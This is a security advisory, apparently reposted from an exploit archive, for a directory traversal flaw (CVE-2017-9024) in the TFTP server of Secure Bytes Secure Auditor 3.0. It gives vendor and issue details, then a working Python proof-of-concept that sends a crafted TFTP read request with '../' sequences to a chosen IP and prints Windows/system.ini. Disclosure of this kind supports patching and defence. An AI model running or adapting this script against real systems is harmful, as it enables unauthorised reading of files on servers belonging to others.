Secure Auditor 3.0 - Directory Traversal Exploit

[+] Credits: John Page aka HYP3RLINX    
 
Vendor:
====================
www.secure-bytes.com
 
  
Product:
=====================
Secure Auditor - v3.0
 
Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.
 
 
 
Vulnerability Type:
===================
Directory Traversal
 
 
 
CVE Reference:
==============
CVE-2017-9024
 
 
 
Security Issue:
================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.
 
 
 
 
Exploit/POC:
=============
import sys,socket
 
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
 
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini' 
PORT = 69                                        
  
PAYLOAD = "\x00\x01"                #TFTP Read 
PAYLOAD += FILE+"\x00"              #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"           #TFTP Type
  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
 
print "Victim Data located on : %s " %(HOST)
print out.strip()

#  0day.today [2018-03-14]  #